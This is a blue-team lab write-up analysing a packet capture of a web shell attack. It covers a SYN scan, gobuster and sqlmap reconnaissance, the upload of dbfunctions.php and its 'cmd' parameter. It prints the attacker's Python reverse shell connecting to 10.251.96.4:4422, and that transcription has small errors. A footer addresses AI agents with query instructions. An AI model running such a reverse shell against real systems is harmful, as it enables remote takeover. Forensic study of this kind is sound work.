# Network Analysis – Web Shell

## What is the IP responsible for conducting the port scan activity?

Port scanning is done for TCP ports.

In order to see the port scan activity, we have to to go `Statistics > Conversations > TCP`.

<figure><img src="/files/9TUAVpj1bYoxIoak0GHo" alt=""><figcaption></figcaption></figure>

### Answer

```
10.251.96.4
```

## What is the port range scanned by the suspicious host?

Let's sort `Port B` in an ascending order.

<figure><img src="/files/BrNfKGSOxi5p9DbWWflh" alt=""><figcaption></figcaption></figure>

We can see that the last port scanned is 1024.

### Answer

```
1-1024
```

## What is the type of port scan conducted?

We can filter the packets using the following filter:

```
ip.src == 10.251.96.4
```

<figure><img src="/files/Z18BsipRJrQU730njEUG" alt=""><figcaption></figcaption></figure>

The packets that we filtered are TCP packets with the SYN flag set.

### Answer

```
TCP SYN
```

## Question 4

> Two more tools were used to perform reconnaissance against open ports, what were they?

The application/tool and its version can be identified using the `User-Agent` header.

Using the following filter we can filter out packets sent to the suspicious agent and the User-Agent header.

```
ip.dst == 10.251.96.5 && http.user_agent
```

<figure><img src="/files/yC8ijY3ZwuAsFlTM4aQn" alt=""><figcaption></figcaption></figure>

As we can see the first tool is GoBuster which is enumerating all the directories.

In order to find the second tool, we have to scroll down until we find an encoded URI.

<figure><img src="/files/Dy9pbFvmStmeIwT4P0is" alt=""><figcaption></figcaption></figure>

The second tool is SQLmap.

### Answer

```
gobuster 3.0.1, sqlmap 1.4.7
```

## What is the name of the php file through which the attacker uploaded a web shell?

The HTTP POST method is used to upload data to a server. We can filter for these packets using the following filter:

```
http.request.method == POST
```

Scrolling down, we can see a POST request made for a `upload.php` file.

<figure><img src="/files/OHpvaeyvTA65QbI5Rn0z" alt=""><figcaption></figcaption></figure>

The `Referer` header in the packet tells us the address from which a resource has been requested.

### Answer

```
editprofile.php
```

## What is the name of the web shell that the attacker uploaded?

Let's follow the TCP stream for the same packet by going to `Follow > TCP Stream`.

<figure><img src="/files/AEWF4fTRckuGLeF6DiSK" alt=""><figcaption></figcaption></figure>

As we can see the `Content-Disposition` header is set to `form-data` with the `dbfunctions.php` as the filename.

### Answer

```
dbfunctions.php
```

## What is the parameter used in the web shell for executing commands?

In the same TCP Stream we can see an if statement that takes `cmd` as the parameter.

<figure><img src="/files/jQzlHKYb1WO8NTKE1FBv" alt=""><figcaption></figcaption></figure>

### Answer

```
cmd
```

## What is the first command executed by the attacker?

The commands to the uploaded file are sent using GET requests. We can use the following filter to separate out these packets.

```
http.request.method == GET
```

<figure><img src="/files/jdHs5xX4n3kxSlYZtbWW" alt=""><figcaption></figcaption></figure>

There were three commands executed: `id`, `python code` and `whoami`.

### Answer

```
id
```

## What is the type of shell connection the attacker obtains through command execution?

We need to open the packet with the python script.

<figure><img src="/files/3iNl9uxpFZpRsjSy5c8q" alt=""><figcaption></figcaption></figure>

Once formatted, the script looks as follows:

```python
import socket, subprocess, os;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.connect("10.251.96.4", 4422);
os.dup2(S.fileno(),0)
os.dup2(S.fileno(),0)
os.dup2(S.fileno(),0)
p = subprocess.call(["/bin/sh", "-i"])
```

It creates a socket object `s` and connects to the specified IP address ("10.251.96.4") and port (4422).

It then uses `subprocess.call` to execute the `/bin/sh` shell with the "-i" flag, which opens an interactive shell session, effectively allowing the user to control the remote server.

This is inline with the characteristics of a reverse shell.

### Answer

<pre><code><strong>Reverse shell
</strong></code></pre>

## What is the port he uses for the shell connection?

We saw that the reverse shell connects to port 4422.

### Answer

```
4422
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kunalwalavalkar.gitbook.io/write-ups/blue-team-labs-online/network-analysis-web-shell.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.